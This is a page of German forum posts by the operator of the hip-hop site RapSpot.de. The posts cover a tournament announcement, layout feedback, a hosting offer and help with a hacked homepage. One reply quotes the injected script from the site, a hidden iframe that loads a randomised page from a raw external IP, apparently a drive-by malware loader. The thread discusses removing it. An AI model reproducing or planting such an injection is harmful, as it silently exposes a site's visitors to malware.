Beiträge von w.white

Zitat von sudeki05

Eine .txt - DATEI angehängt ;) Du solltest das ganze schon richtig lesen...

Ähm... und wäre wohl angebracht, dann diesen JS-Code zu entfernen, wenn er nicht gewollt ist...

Code
    <SCRIPT>
    window.status='Done';
    document.write('<iframe name=cbc4738199a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*273890)+'8f71611b\' width=610 height=449 style=\'display: none\'></iframe>')</SCRIPT>

ist er nicht aber wenn ich ihn lösche dann kommt ein neuer (anderer) wie es schon 2 mal passiert ist.

Zitat von sudeki05

Poste dein QUELLCODE, keine Datei... ;)
    am besten die ganze index.html löschen und ein backup draufspielen, welches nicht infiziert ist..

Was glaubst du warum ichs als .txt hochgeladen hab :roll:

@ DarkSyranus

Was soll ich jetzt tun?

Sry. für Doppelpost aber ich will hier schnell was ankündigen:

Nach einigem Organisatorischen Sachen haben wir es jetzt geschafft ein Battleturnier auf die Beine zu stellen. Alle Infos und Anmeldung findet ihr im Forum. Wir wären froh wenn einige aus eurem Forum Lust hätten mitzumachen, das Turnier findet in den Berreichen Text, Audio und Beat Contest statt. Mitmachen lohnt sich auch aufjedenfall da wir einige Preise organisieren konnten. Wie gesagt wir wären froh wenn sich einige von hier melden würden,

MfG das Team

Ich habe momentan ein Problem, beim Klick auf meine Seite -> http://www.RapSpot.de kommen vereinzelt Trojaner Meldungen vor. Dies wird natürlich kein echter Trojaner sein sondern nur irgendeine Stelle die als Trojaner indentifiziert wird. Wie kann ich verhindern das selbiges als trojaner erkannt wird? Wirkt halt recht unseriös wenn man gleich eine Trojaner Warnung bekommt.

Ich wollt nur nochmal drauf hinweisen das ich das Portal ein bisschen umgestaltet habe, nach unten stimmt noch so einiges nicht, und Navi muss ich auch noch austauschen um das Hüpfen zu beseitigen.

Sehr Gerne, Ich hoff wir sehen uns da,

Ich möchte auch Ankündigen das für die Zukunft einige Aktionen geplant sind unter anderem welche bei denen Preise zu gewinnen sein werden! Also immer mal wieder draufschauen, wenn ihr Zeit und Lust habt! :wink:

Zitat von jojo87

Dein Menu erscheint mal überm Baner, mal drunter, ->ändern!

Das Problem dabei is das das Menü unten besser aussieht (Meine Meinung) und das aber im Forum nicht geht da sonst 2 Menüs übereinander stehen (das Forums Menü und Portal Menü) Hat jemand ne Idee wie ich das lösen könnte (die Navi komplett nach Oben zu tun is bisher die einzigste die mir einfällt)

Zitat von CLiff

nur ein Tipp nebenbei, obwohl das HipHoppern wohl egal sein wird.. Ein bisschen auf die Rechstschreibung achten.
    zb zum Besseren, demnach auch zum Schlechteren..
    Naja auch das mitten im Satz "Alle" oder "Seit" großschreiben, Geschmackssache, aber ich finde es eigentlich irritierend.. Naja liebe Grüße ;)

Kein Vorurteile Subkulturen gegenüber :P Ya das is ne kleine Macke von mir das ich sehr viel, und ohne Grund, großschreib, aber du hast recht das wirkt sehr unseriös. :wink:

Hey,

Ich wollte euch mal meine Hip Hop Community näher Legen. RapSpot.de ist seit Kurzem Wieder online, aufgrund einiger Probleme waren wir zum Neustart gezwungen. Wir sind momentan am Ausbauen bzw. Wieder aufbauen aber Das Meiste funktioniert maklelos. Ich bin für Konstruktive Kritik und Feeback offen.

Natürlich ist Anmelden auch nicht Verboten und erwünscht

MfG das RapSpot.de Team

Hey,

Ich wollte euch mal meine Hip Hop Community näher Legen. RapSpot.de ist seit Kurzem Wieder online, aufgrund einiger Probleme waren wir zum Neustart gezwungen. Wir sind momentan am Ausbauen bzw. Wieder aufbauen aber Das Meiste funktioniert maklelos. Ich bin für Konstruktive Kritik und Feeback offen.

Natürlich ist Anmelden auch nicht Verboten und erwünscht

MfG das RapSpot.de Team

Das sollte mir der Interessent mitteilen. Also was er braucht! :wink: Prinzipiell kann ich mit Fast allem Dienen. Sowas wie MySQL PHP usw. is natürlich Standart und Traffic und Platz usw. Wird dann in einem Gespräch Geklärt